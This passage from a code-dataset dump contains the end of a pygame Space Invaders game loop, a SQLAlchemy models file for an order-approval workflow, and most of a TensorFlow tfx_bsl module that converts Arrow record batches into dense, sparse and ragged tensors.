At a time only 1 bullet can be fired\r\n Bullet_can_be_Fired = True # Now Bullet can be fired\r\n if Bullet_is_on_Screen == False: # Only if no bullet is on Screen, then only fire next one\r\n Bullet_is_on_Screen = True\r\n Bullet_Pos_X = SpaceShip_Pos_X + 16\r\n Bullet_Pos_Y = SpaceShip_Pos_Y - 32 - 5\r\n if event.type == pygame.KEYUP: # KEYUP means Key is released\r\n pass # Nothing to do with this Game\r\n\r\n # Draw Spaceship Continously over the screen\r\n drawSpaceShip(SpaceShip_Pos_X, SpaceShip_Pos_Y)\r\n\r\n for Alien_pos, Alien in enumerate(Aliens_Image):\r\n Bullet_coolided_with_ALien = detectCollision(Bullet_Pos_X, Bullet_Pos_Y, Aliens_Pos_X[Alien_pos],Aliens_Pos_Y[Alien_pos])\r\n\r\n # Display Current Bullet and Current enemy over the screen, until they are not collided\r\n if not Bullet_coolided_with_ALien:\r\n # Enemy Movement\r\n # While it will hit at left wall it will start moving to right\r\n # While it will hit at right wall it will start moving at left\r\n if Aliens_Pos_X[Alien_pos] <= 0:\r\n Move_To_Right[Alien_pos] = True\r\n Move_To_Left[Alien_pos] = False\r\n if Aliens_Pos_X[Alien_pos] >= 800 - 64 - 0.1:\r\n Move_To_Right[Alien_pos] = False\r\n Move_To_Left[Alien_pos] = True\r\n if Move_To_Right[Alien_pos]:\r\n Aliens_Pos_X[Alien_pos] += 0.8\r\n if Move_To_Left[Alien_pos]:\r\n Aliens_Pos_X[Alien_pos] -= 0.8\r\n Aliens_Pos_Y[Alien_pos] += 0.02\r\n\r\n # Draw Alien Continously over the screen\r\n drawAlien(Aliens_Image[Alien_pos], Aliens_Pos_X[Alien_pos], Aliens_Pos_Y[Alien_pos])\r\n\r\n # Bullet Movement\r\n if Bullet_can_be_Fired:\r\n # If bullet is on screen keep on moving\r\n if Bullet_is_on_Screen:\r\n # If Bullet disappear from screen\r\n # Next bullet is ready for Fire\r\n # If we press Spacebar\r\n if Bullet_Pos_Y <= 0:\r\n Bullet_can_be_Fired = False # Ready for next bullet\r\n Bullet_is_on_Screen = False # Current bullet got disappear from screen\r\n drawBullet(Bullet_Pos_X, Bullet_Pos_Y)\r\n Bullet_Pos_Y -= 1\r\n # Bullet Sound\r\n Bullet_Sound.play()\r\n else:\r\n Player_Score += 1\r\n\r\n # Explosion Sound\r\n mixer.music.load(\"Supporting_Images\\\\Explosion.wav\")\r\n mixer.music.play()\r\n\r\n # Reset Bullet Status\r\n Bullet_Pos_X = 0\r\n Bullet_Pos_Y = 0\r\n Bullet_can_be_Fired = False\r\n Bullet_is_on_Screen = False\r\n\r\n # Regenerate Alien for that position\r\n # Create a New Alien\r\n Aliens_Pos_X[Alien_pos] = random.randint(0, 736)\r\n Aliens_Pos_Y[Alien_pos] = random.randint(10, 100)\r\n Move_To_Right[Alien_pos] = True\r\n Move_To_Left[Alien_pos] = False\r\n\r\n # Check If Alien entered into spaceship zone\r\n if AlienEnterdIntoSpaceshipArea(Aliens_Pos_Y[Alien_pos]+64, SpaceShip_Pos_Y):\r\n Game_Over = True\r\n break\r\n else:\r\n GameOverMessage()\r\n for event in pygame.event.get(): # Capture all the events at every moment\r\n if event.type == pygame.QUIT: # Pressed close button of the screen window\r\n Game_ON = False # Game screen is closed\r\n\r\n # Show Player Score\r\n showPlayerScore(Player_Score)\r\n else:\r\n SupportingFileIssueMessage()\r\n for event in pygame.event.get(): # Capture all the events at every moment\r\n if event.type == pygame.QUIT: # Pressed close button of the screen window\r\n Game_ON = False # Game screen is closed\r\n\r\n # Update Game Screen\r\n # We need to updae screen in a continuous manner\r\n # so that game screen always gets updated with setting u have done\r\n 
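# The manual bounds arithmetic in detectCollision() above can also be
# expressed with pygame's own rectangle test; a sketch using the sprite sizes
# noted in the comments (bullet 32x32, alien 64x64), not code from the
# original game:
import pygame

def collided(bullet_x, bullet_y, alien_x, alien_y):
    # Rect.colliderect performs the same axis-aligned overlap check that
    # detectCollision() spells out by hand.
    bullet_rect = pygame.Rect(bullet_x, bullet_y, 32, 32)
    alien_rect = pygame.Rect(alien_x, alien_y, 64, 64)
    return bullet_rect.colliderect(alien_rect)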
pygame.display.update()","repo_name":"rajarshi9739708186/Python-Projects","sub_path":"Game_SpaceInvaders/Code/Game_SpaceInvaders.py","file_name":"Game_SpaceInvaders.py","file_ext":"py","file_size_in_byte":11615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12507282748","text":"from core import db\nfrom sqlalchemy.orm import relationship\n\nroles = {\n \"sales\":10,\n \"engineering\":20,\n \"production\":30,\n \"finance\":40,\n \"test\":50,\n \"customer\":90\n}\n\nstates = {\n \"added\" : 1,\n \"confirm_add\" : 2,\n \"cost_set\" : 3,\n \"confirm_cost\" : 4,\n \"payed\" : 5,\n \"confirm_pay\": 6,\n \"production_done\":8,\n \"test_done\":9,\n \"production_test_done\":10,\n \"confirm_ready\":11\n}\n\nstates_str = {\n 1: \"Waiting for approve by sales\",\n 2: \"Waiting for set cost by engineering\",\n 3: \"Waiting for approve cost by sales\",\n 4: \"Waiting for pay by customer\",\n 5: \"Waiting for approve payment by finance\",\n 6: \"Waiting for finish production \",\n 8: \"Waiting for QC Test done\",\n 9: \"Waiting for finish QC problems\",\n 10: \"Waiting for approve product by sales\",\n 11: \"Ready\"\n}\n\nclass User(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n username = db.Column(db.String(11),index=True, unique=True)\n password = db.Column(db.String(11))\n role = db.Column(db.Integer)\n\nclass Product(db.Model):\n __tablename__ = 'products'\n id = db.Column(db.Integer,primary_key=True, autoincrement=True)\n name = db.Column(db.String(100))\n picture = db.Column(db.String(100))\n description = db.Column(db.String(200))\n\nclass Order(db.Model):\n __tablename__ = 'orders'\n id = db.Column(db.Integer,primary_key=True, autoincrement=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n user = relationship(\"User\", foreign_keys=user_id)\n product_id = db.Column(db.Integer, db.ForeignKey('products.id'))\n product = relationship(\"Product\", foreign_keys=product_id)\n count = db.Column(db.Integer)\n description = db.Column(db.String(200))\n date = db.Column(db.Integer)\n state = db.Column(db.Integer)\n cost = db.Column(db.Integer)\n test_pass = db.Column(db.Integer)\n \n\n","repo_name":"mabdi/acme-workflow","sub_path":"modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26484589957","text":"import abc\nimport functools\nimport typing\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nimport pyarrow as pa\nimport tensorflow as tf\nfrom tfx_bsl.arrow import array_util\nfrom tfx_bsl.arrow import path\n\nfrom tensorflow_metadata.proto.v0 import schema_pb2\n\nTensorRepresentations = Dict[str, schema_pb2.TensorRepresentation]\n\n\nclass TensorAdapterConfig(object):\n \"\"\"Config to a TensorAdapter.\n\n Contains all the information needed to create a TensorAdapter.\n \"\"\"\n\n def __init__(self,\n arrow_schema: pa.Schema,\n tensor_representations: TensorRepresentations,\n original_type_specs: Optional[Dict[str, tf.TypeSpec]] = None):\n self.arrow_schema = arrow_schema\n self.tensor_representations = tensor_representations\n self.original_type_specs = original_type_specs\n\n # See b/167128119 for the reason behind custom pickle/unpickle\n # implementations.\n def __getstate__(self):\n return (self.arrow_schema, {\n k: v.SerializeToString()\n for k, v in 
self.tensor_representations.items()\n }, self.original_type_specs)\n\n def __setstate__(self, t):\n tensor_representations = {}\n for k, v in t[1].items():\n r = schema_pb2.TensorRepresentation()\n r.ParseFromString(v)\n tensor_representations[k] = r\n self.__init__(t[0], tensor_representations, t[2])\n\n\nclass TensorAdapter(object):\n \"\"\"A TensorAdapter converts a RecordBatch to a collection of TF Tensors.\n\n The conversion is determined by both the Arrow schema and the\n TensorRepresentations, which must be provided at initialization time.\n Each TensorRepresentation contains the information needed to translate one\n or more columns in a RecordBatch of the given Arrow schema into a TF Tensor\n or CompositeTensor. They are contained in a Dict whose keys are\n the names of the tensors, which will be the keys of the Dict produced by\n ToBatchTensors().\n\n TypeSpecs() returns static TypeSpecs of those tensors by their names, i.e.\n if they have a shape, then the size of the first (batch) dimension is always\n unknown (None) because it depends on the size of the RecordBatch passed to\n ToBatchTensors().\n\n It is guaranteed that for any tensor_name in the given TensorRepresentations\n self.TypeSpecs()[tensor_name].is_compatible_with(\n self.ToBatchTensors(...)[tensor_name])\n\n Sliced RecordBatches and LargeListArray columns having null elements backed by\n non-empty sub-lists are not supported and will yield undefined behaviour.\n \"\"\"\n\n __slots__ = [\n \"_arrow_schema\", \"_type_handlers\", \"_type_specs\", \"_original_type_specs\"\n ]\n\n def __init__(self, config: TensorAdapterConfig):\n\n self._arrow_schema = config.arrow_schema\n self._type_handlers = _BuildTypeHandlers(config.tensor_representations,\n config.arrow_schema)\n self._type_specs = {\n tensor_name: handler.type_spec\n for tensor_name, handler in self._type_handlers\n }\n\n self._original_type_specs = (\n self._type_specs\n if config.original_type_specs is None else config.original_type_specs)\n\n for tensor_name, type_spec in self._type_specs.items():\n original_type_spec = self._original_type_specs.get(tensor_name, None)\n if original_type_spec is None or original_type_spec != type_spec:\n raise ValueError(\n \"original_type_specs must be a superset of type_specs derived from \"\n \"TensorRepresentations. But for tensor {}, got {} vs {}\".format(\n tensor_name, original_type_spec, type_spec))\n\n def OriginalTypeSpecs(self) -> Dict[str, tf.TypeSpec]:\n \"\"\"Returns the origin's type specs.\n\n A TFXIO 'Y' may be a result of projection of another TFXIO 'X', in which\n case 'X' is the origin of 'Y', and this method returns what\n X.TensorAdapter().TypeSpecs() would return.\n\n May be equal to `self.TypeSpecs()`.\n\n Returns: a mapping from tensor names to `tf.TypeSpec`s.\n \"\"\"\n return self._original_type_specs\n\n def TypeSpecs(self) -> Dict[str, tf.TypeSpec]:\n \"\"\"Returns the TypeSpec for each tensor.\"\"\"\n return self._type_specs\n\n def ToBatchTensors(\n self,\n record_batch: pa.RecordBatch,\n produce_eager_tensors: Optional[bool] = None) -> Dict[str, Any]:\n \"\"\"Returns a batch of tensors translated from `record_batch`.\n\n Args:\n record_batch: input RecordBatch.\n produce_eager_tensors: controls whether ToBatchTensors() produces\n eager tensors or ndarrays (or Tensor value objects). 
If None, determine\n that from whether TF Eager mode is enabled.\n\n Raises:\n RuntimeError: when Eager Tensors are requested but TF is not executing\n eagerly.\n ValueError: when any handler fails to produce a Tensor.\n \"\"\"\n\n tf_executing_eagerly = tf.executing_eagerly()\n if produce_eager_tensors and not tf_executing_eagerly:\n raise RuntimeError(\n \"Eager Tensors were requested but eager mode was not enabled.\")\n if produce_eager_tensors is None:\n produce_eager_tensors = tf_executing_eagerly\n\n if not record_batch.schema.equals(self._arrow_schema):\n raise ValueError(\"Expected same schema.\")\n result = {}\n for tensor_name, handler in self._type_handlers:\n try:\n result[tensor_name] = handler.GetTensor(record_batch,\n produce_eager_tensors)\n except Exception as e:\n raise ValueError(\n \"Error raised when handling tensor '{}'\".format(tensor_name)) from e\n\n return result\n\n\nclass _TypeHandler(abc.ABC):\n \"\"\"Base class of all type handlers.\n\n A TypeHandler converts one or more columns in a RecordBatch to a TF Tensor\n or CompositeTensor according to a TensorRepresentation.\n\n All TypeHandlers are registered by TensorRepresentation types in\n _TYPE_HANDLER_MAP.\n \"\"\"\n\n __slots__ = []\n\n @abc.abstractmethod\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n \"\"\"Initializer.\n\n It can be assumed that CanHandle(arrow_schema, tensor_representation) would\n return true.\n\n Args:\n arrow_schema: the Arrow Schema that all the RecordBatches that\n self.GetTensor() will take conform to.\n tensor_representation: the TensorRepresentation that determines the\n conversion.\n \"\"\"\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n \"\"\"Returns the TypeSpec of the converted Tensor or CompositeTensor.\"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Any:\n \"\"\"Converts the RecordBatch to Tensor or CompositeTensor.\n\n The result must be of the same (not only compatible) TypeSpec as\n self.type_spec.\n\n Args:\n record_batch: a RecordBatch that is of the same Schema as what was passed\n at initialization time.\n produce_eager_tensors: if True, returns Eager Tensors, otherwise returns\n ndarrays or Tensor value objects.\n\n Returns:\n A Tensor or a CompositeTensor. 
Note that their types may vary depending\n on whether the TF eager mode is on.\n \"\"\"\n\n @staticmethod\n @abc.abstractmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n \"\"\"Returns true if an instance of the handler can handle the combination.\"\"\"\n\n\nclass _BaseDenseTensorHandler(_TypeHandler):\n \"\"\"Base class of DenseTensorHandlers.\"\"\"\n\n __slots__ = [\n \"_column_index\", \"_dtype\", \"_shape\", \"_unbatched_flat_len\",\n \"_convert_to_binary_fn\"\n ]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n dense_rep = tensor_representation.dense_tensor\n column_name = dense_rep.column_name\n self._column_index = arrow_schema.get_field_index(column_name)\n _, value_type = _GetNestDepthAndValueType(arrow_schema,\n path.ColumnPath(column_name))\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n unbatched_shape = [\n d.size for d in tensor_representation.dense_tensor.shape.dim\n ]\n self._shape = [None] + unbatched_shape\n self._unbatched_flat_len = int(np.prod(unbatched_shape, initial=1))\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n # TF's type stub is not correct about TypeSpec and its sub-classes.\n return typing.cast(tf.TypeSpec, tf.TensorSpec(self._shape, self._dtype))\n\n def _ListArrayToTensor(\n self, list_array: pa.Array,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n \"\"\"Converts a ListArray to a dense tensor.\"\"\"\n values = list_array.flatten()\n batch_size = len(list_array)\n expected_num_elements = batch_size * self._unbatched_flat_len\n if len(values) != expected_num_elements:\n raise ValueError(\n \"Unable to convert a {} to a tensor of type spec {}: size mismatch. \"\n \"Expected {} elements but got {}. \"\n \"If your data type is tf.Example, make sure that the feature \"\n \"is always present, and has the same length in all the examples. 
\"\n \"TFX users should make sure there is no data anomaly for the feature.\"\n .format(\n type(list_array), self.type_spec, expected_num_elements,\n len(values)))\n actual_shape = list(self._shape)\n actual_shape[0] = batch_size\n if self._convert_to_binary_fn is not None:\n values = self._convert_to_binary_fn(values)\n values_np = np.asarray(values).reshape(actual_shape)\n if produce_eager_tensors:\n return tf.convert_to_tensor(values_np)\n\n return values_np\n\n @staticmethod\n def BaseCanHandle(\n arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema,\n path.ColumnPath(tensor_representation.dense_tensor.column_name))\n # Can only handle 1-nested lists.\n return depth == 1 and _IsSupportedArrowValueType(value_type)\n\n\nclass _DenseTensorHandler(_BaseDenseTensorHandler):\n \"\"\"Handles conversion to dense.\"\"\"\n\n __slots__ = []\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n column = record_batch.column(self._column_index)\n return self._ListArrayToTensor(column, produce_eager_tensors)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n return (_BaseDenseTensorHandler.BaseCanHandle(arrow_schema,\n tensor_representation) and\n not tensor_representation.dense_tensor.HasField(\"default_value\"))\n\n\nclass _DefaultFillingDenseTensorHandler(_BaseDenseTensorHandler):\n \"\"\"Handles conversion to dense with default filling.\"\"\"\n\n __slots__ = [\"_default_fill\"]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n _, value_type = _GetNestDepthAndValueType(\n arrow_schema,\n path.ColumnPath(tensor_representation.dense_tensor.column_name))\n self._default_fill = _GetDefaultFill(\n self._shape[1:], value_type,\n tensor_representation.dense_tensor.default_value)\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n column = record_batch.column(self._column_index)\n column = array_util.FillNullLists(column, self._default_fill)\n return self._ListArrayToTensor(column, produce_eager_tensors)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n return (_BaseDenseTensorHandler.BaseCanHandle(arrow_schema,\n tensor_representation) and\n tensor_representation.dense_tensor.HasField(\"default_value\"))\n\n\nclass _VarLenSparseTensorHandler(_TypeHandler):\n \"\"\"Handles conversion to varlen sparse.\"\"\"\n\n __slots__ = [\"_column_index\", \"_dtype\", \"_convert_to_binary_fn\"]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n column_name = tensor_representation.varlen_sparse_tensor.column_name\n self._column_index = arrow_schema.get_field_index(column_name)\n _, value_type = _GetNestDepthAndValueType(arrow_schema,\n path.ColumnPath(column_name))\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n return typing.cast(\n tf.TypeSpec,\n tf.SparseTensorSpec(tf.TensorShape([None, None]), self._dtype))\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) 
-> Any:\n array = record_batch.column(self._column_index)\n coo_array, dense_shape_array = array_util.CooFromListArray(array)\n dense_shape_np = dense_shape_array.to_numpy()\n values_array = array.flatten()\n if self._convert_to_binary_fn is not None:\n values_array = self._convert_to_binary_fn(values_array)\n values_np = np.asarray(values_array)\n coo_np = coo_array.to_numpy().reshape(values_np.size, 2)\n\n if produce_eager_tensors:\n return tf.sparse.SparseTensor(\n indices=tf.convert_to_tensor(coo_np),\n dense_shape=tf.convert_to_tensor(dense_shape_np),\n values=tf.convert_to_tensor(values_np))\n return tf.compat.v1.SparseTensorValue(\n indices=coo_np, dense_shape=dense_shape_np, values=values_np)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema,\n path.ColumnPath(\n [tensor_representation.varlen_sparse_tensor.column_name]))\n # Currently can only handle 1-nested lists, but can easily support\n # arbitrarily nested ListArrays.\n return depth == 1 and _IsSupportedArrowValueType(value_type)\n\n\nclass _SparseTensorHandler(_TypeHandler):\n \"\"\"Handles conversion to SparseTensors.\"\"\"\n\n __slots__ = [\n \"_index_column_indices\", \"_value_column_index\", \"_shape\", \"_dtype\",\n \"_coo_size\", \"_convert_to_binary_fn\"\n ]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n sparse_representation = tensor_representation.sparse_tensor\n self._index_column_indices = tuple(\n arrow_schema.get_field_index(c)\n for c in sparse_representation.index_column_names)\n self._value_column_index = arrow_schema.get_field_index(\n sparse_representation.value_column_name)\n self._shape = [dim.size for dim in sparse_representation.dense_shape.dim]\n _, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(sparse_representation.value_column_name))\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._coo_size = len(self._shape) + 1\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n batched_shape = [None] + [dim if dim != -1 else None for dim in self._shape]\n return typing.cast(\n tf.TypeSpec,\n tf.SparseTensorSpec(tf.TensorShape(batched_shape), self._dtype))\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Any:\n values_array = record_batch.column(self._value_column_index)\n values_parent_indices = array_util.GetFlattenedArrayParentIndices(\n values_array)\n indices_arrays = [np.asarray(values_parent_indices)]\n for index_column_index in self._index_column_indices:\n indices_arrays.append(\n np.asarray(record_batch.column(index_column_index).flatten()))\n flat_values_array = values_array.flatten()\n if self._convert_to_binary_fn is not None:\n flat_values_array = self._convert_to_binary_fn(flat_values_array)\n values_np = np.asarray(flat_values_array)\n coo_np = np.empty(shape=(len(values_np), self._coo_size), dtype=np.int64)\n try:\n np.stack(indices_arrays, axis=1, out=coo_np)\n except ValueError as e:\n raise ValueError(\"Error constructing the COO for SparseTensor. 
\"\n \"number of values: {}; \"\n \"size of each index array: {}\".format(\n len(values_np),\n [len(i) for i in indices_arrays])) from e\n\n dense_shape = [len(record_batch)] + self._shape\n\n if produce_eager_tensors:\n return tf.sparse.SparseTensor(\n indices=tf.convert_to_tensor(coo_np),\n dense_shape=tf.convert_to_tensor(dense_shape, dtype=tf.int64),\n values=tf.convert_to_tensor(values_np))\n return tf.compat.v1.SparseTensorValue(\n indices=coo_np, dense_shape=dense_shape, values=values_np)\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n \"\"\"Returns whether `tensor_representation` can be handled.\"\"\"\n sparse_representation = tensor_representation.sparse_tensor\n if (len(sparse_representation.dense_shape.dim) != len(\n sparse_representation.index_column_names)):\n return False\n\n # All the index columns must be of integral types.\n for index_column in sparse_representation.index_column_names:\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(index_column))\n if depth != 1 or not pa.types.is_integer(value_type):\n return False\n\n depth, value_type = _GetNestDepthAndValueType(\n arrow_schema, path.ColumnPath(sparse_representation.value_column_name))\n return depth == 1 and _IsSupportedArrowValueType(value_type)\n\n\nclass _RaggedTensorHandler(_TypeHandler):\n \"\"\"Handles conversion to RaggedTensors.\"\"\"\n\n __slots__ = [\n \"_column_index\",\n \"_value_path\",\n \"_dtype\",\n \"_row_partition_dtype\",\n \"_convert_to_binary_fn\",\n \"_inner_fixed_shape\",\n \"_values_fixed_shape\",\n \"_inferred_dimensions_elements\",\n \"_outer_ragged_rank\",\n \"_ragged_partitions\",\n \"_fixed_dimension_partitions\",\n ]\n\n def __init__(self, arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation):\n super().__init__(arrow_schema, tensor_representation)\n ragged_representation = tensor_representation.ragged_tensor\n\n self._value_path = path.ColumnPath.from_proto(\n ragged_representation.feature_path)\n self._column_index = arrow_schema.get_field_index(\n ragged_representation.feature_path.step[0])\n self._outer_ragged_rank, value_type = _GetNestDepthAndValueType(\n arrow_schema, self._value_path)\n\n # Split partitions to the ones defining Ragged dimensions and the ones\n # defining the outer dimensions shape (through uniform row length\n # partitions).\n fixed_dimension = True\n ragged_partitions = []\n fixed_dimension_partitions = []\n # Reverse through the partitions (from outer partition to inner), in order\n # to extract the inner fixed shape of the resulting RaggedTensor.\n for partition in reversed(ragged_representation.partition):\n if partition.HasField(\"uniform_row_length\") and fixed_dimension:\n fixed_dimension_partitions.append(partition)\n else:\n fixed_dimension = False\n ragged_partitions.append(partition)\n self._ragged_partitions = ragged_partitions[::-1]\n self._fixed_dimension_partitions = fixed_dimension_partitions[::-1]\n\n inner_fixed_shape = []\n inferred_dimensions_elements = 1\n for partition in self._fixed_dimension_partitions:\n inner_fixed_shape.append(partition.uniform_row_length)\n inferred_dimensions_elements *= partition.uniform_row_length\n self._inner_fixed_shape = inner_fixed_shape\n self._values_fixed_shape = [-1] + inner_fixed_shape\n self._inferred_dimensions_elements = inferred_dimensions_elements\n\n self._dtype = _ArrowTypeToTfDtype(value_type)\n self._row_partition_dtype = 
self._row_partition_dtype = ragged_representation.row_partition_dtype\n self._convert_to_binary_fn = _GetConvertToBinaryFn(value_type)\n\n @property\n def type_spec(self) -> tf.TypeSpec:\n row_splits_dtype = tf.int64\n if (self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.INT32):\n row_splits_dtype = tf.int32\n ragged_rank = self._outer_ragged_rank + len(self._ragged_partitions)\n shape = [None] * (ragged_rank + 1) + self._inner_fixed_shape\n return typing.cast(\n tf.TypeSpec,\n tf.RaggedTensorSpec(\n shape,\n self._dtype,\n ragged_rank=ragged_rank,\n row_splits_dtype=row_splits_dtype))\n\n def GetTensor(self, record_batch: pa.RecordBatch,\n produce_eager_tensors: bool) -> Union[np.ndarray, tf.Tensor]:\n if (self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.INT32):\n offsets_dtype = np.int32\n elif (self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.INT64 or\n self._row_partition_dtype ==\n schema_pb2.TensorRepresentation.RowPartitionDType.UNSPECIFIED):\n offsets_dtype = np.int64\n\n if produce_eager_tensors:\n # Skip expensive validation since it's entirely dependent on the\n # implementation correctness given that the input RecordBatch is valid.\n factory = functools.partial(\n tf.RaggedTensor.from_row_splits, validate=False)\n else:\n factory = tf.compat.v1.ragged.RaggedTensorValue\n\n # A RaggedTensor is composed of the following dimensions:\n # [B, D_0, D_1, ..., D_N, P_0, P_1, ..., P_M, U_0, U_1, ..., U_P]\n #\n # These dimensions belong to different categories:\n # * B: Batch size dimension\n # * D_n: Dimensions specified by the nested structure from the schema and\n # the column path to the values. n >= 1.\n # * P_m: Dimensions specified by the partitions that do not specify a fixed\n # dimension size. m >= 0.\n # * U_p: Dimensions specified by the inner uniform row length partitions\n # that make the inner dimensions fixed. p >= 0.\n\n # Get the row splits of each level in the record batch.\n # Store the row splits for the D_n dimensions that represent the nested\n # structure of the dataset schema.\n outer_row_splits = []\n\n column_path = self._value_path.suffix(1)\n column = record_batch.column(self._column_index)\n column_type = column.type\n # Keep track of an accessor for the parent struct, so we can access other\n # fields required to get the row splits of later dimensions.\n parent_field_accessor = lambda field: record_batch.column( # pylint:disable=g-long-lambda\n record_batch.schema.get_field_index(field))\n\n while True:\n # TODO(b/156514075): add support for handling slices.\n if column.offset != 0:\n raise ValueError(\n \"This record batch is sliced. 
We currently do not handle converting\"\n \" slices to RaggedTensors.\")\n if pa.types.is_struct(column_type):\n parent_column = column\n parent_field_accessor = parent_column.field\n column = column.field(column_path.initial_step())\n column_path = column_path.suffix(1)\n column_type = column.type\n elif _IsListLike(column_type):\n # Note that we are using raw offsets and values assuming that the array\n # is not sliced (validated above) and there are no null elements backed\n # by non-empty lists (too expensive to validate).\n outer_row_splits.append(np.asarray(column.offsets, dtype=offsets_dtype))\n column = column.values\n column_type = column.type\n else:\n break\n\n # Now that we have stored the row splits for the D_n dimensions, let's\n # start the construction of the RaggedTensor from the inner dimensions to\n # the outermost.\n\n # Take the values and set the shape for the innermost dimensions (U_p)\n if self._convert_to_binary_fn is not None:\n column = self._convert_to_binary_fn(column)\n ragged_tensor = np.reshape(np.asarray(column), self._values_fixed_shape)\n\n # Build the RaggedTensor from the values and the specified partitions.\n\n # Now iterate from the innermost partitions to the outermost.\n # But first we need to pop the last row split from the outer dimensions\n # (D_n) and scale it given the number of elements in the inner fixed\n # dimensions.\n try:\n outer_last_row_split = _FloorDivide(outer_row_splits.pop(),\n self._inferred_dimensions_elements)\n except RuntimeError as e:\n raise ValueError(\n (\"The values feature lengths cannot support \"\n \"the claimed fixed shape {}\").format(self._inner_fixed_shape)) from e\n\n # Keep track of the previous dimension to help build row splits when a\n # uniform row length partition is found.\n prev_dimension = ragged_tensor.shape[0]\n for partition in reversed(self._ragged_partitions):\n if partition.HasField(\"uniform_row_length\"):\n # If a uniform row length partition is found, we need to scale down the\n # last outer dimension row split.\n try:\n outer_last_row_split = _FloorDivide(outer_last_row_split,\n partition.uniform_row_length)\n except RuntimeError as e:\n raise ValueError((\"The values feature lengths cannot support the \"\n \"specified uniform row length of size {}\").format(\n partition.uniform_row_length)) from e\n\n row_splits = np.arange(\n 0,\n prev_dimension + 1,\n partition.uniform_row_length,\n dtype=offsets_dtype)\n\n ragged_tensor = factory(ragged_tensor, row_splits=row_splits)\n try:\n prev_dimension = _FloorDivide(prev_dimension,\n partition.uniform_row_length)\n except RuntimeError as e:\n raise ValueError(\n (\"The previous ragged partitions contained {} elements, \"\n \"which are not valid with the specified uniform row length: {}\"\n ).format(prev_dimension, partition.uniform_row_length)) from e\n\n elif partition.HasField(\"row_length\"):\n row_length_array = parent_field_accessor(partition.row_length)\n\n # When the outermost dimension specified by the partitions (P_0) comes\n # from an array other than the values, we need to update the last\n # dimension row splits defined by the nested structure (D_n) given the\n # offsets of the array.\n outer_last_row_split = np.asarray(\n row_length_array.offsets, dtype=offsets_dtype)\n\n # Build row splits.\n row_length = np.asarray(row_length_array.flatten())\n row_splits = np.zeros(len(row_length) + 1, dtype=offsets_dtype)\n np.cumsum(row_length, out=row_splits[1:])\n\n 
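# row_splits is the exclusive prefix sum of row_length: row_splits[i] is\n # the total number of values contained in the first i rows.\n 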
